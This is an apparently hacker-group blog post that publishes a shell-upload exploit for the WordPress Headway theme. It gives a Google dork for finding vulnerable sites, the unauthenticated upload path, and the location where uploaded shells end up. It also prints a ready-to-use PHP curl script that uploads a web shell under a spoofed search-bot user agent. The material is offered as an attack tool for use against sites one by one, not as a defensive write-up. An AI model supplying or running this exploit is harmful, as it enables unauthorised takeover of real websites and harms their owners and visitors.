Wordpress Headway Themes Shell Upload Vulnerability - 3xploi7 BuG

Wordpress Headway Themes Shell Upload Vulnerability

#-Title: Wordpress Headway Themes Shell Upload Vulnerability
#-Author: Anonymously
#-Date: 10/27/2015
#- Vendor : headwaythemes. com
#- Developer : Clay Griffith
#- Link Download : headwaythemes. com/pricing/
#-Google Dork: inurl:wp-content/themes/headway-(random)
#- Tested on : Trusty Tahr
#- Fixed in ??

·        Vulnerability : /wp-content/themes/headway-(random)/library/visual-editor/lib/upload-header.php 
·         When Vulnerable /home/localhost/public_html/

Proof Of Concept :

Tools Coded by Mr.MaGnoM


/*link of tool with vedio : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.htmlcoded by mr magnommore tools visit my blog  ==> magsec.blogspot.com  :)
so why i didnt make auto exploiter because theme headway dont have one namefor example u will filn /headway-2014/ and  /headway-2015/ or /headway-163/  , /headway-120/so is soo defficult to make auto exploiter so u must cheek firstly complet name of theme than
write it on site.com/wp-content/themes/headway(complet name)/library/visual-editor/lib/upload-header.php
shell go to  : site/wp-content/uploads/headway/header-uploads/shell is stabl for all site
that script on php for exploit site by site :/
to understand good watch video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html*/

$url="3xploi7.id"; // link here
$file="lolz.php ";   // ur shell here
$post = array('Filedata'=>"@$file") ;$ch = curl_init();curl_setopt ($ch, CURLOPT_URL, "$url");curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,$post);curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);$data = curl_exec($ch);curl_close($ch);//print $data;if($data=="1"){  echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";}else{  echo "\nnot infected\n";}

Shell Acces ?  Here

3xploi7 Team

0 Response to "Wordpress Headway Themes Shell Upload Vulnerability"

Posting Komentar

Tempat Diskusi

Iklan Atas Artikel

3xploi7 1

seo explanation, online courses on digital marketing, internet marketing classes online

3xploi7 2

Iklan Bawah Artikel

Stay toon disini ya karena artikel akan selalu di update.
Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya, Jangan sampai Terlewatkan.

• Join Grup Team :
 — Facebook Grup ( 4.325 Anggota )
 — Line Square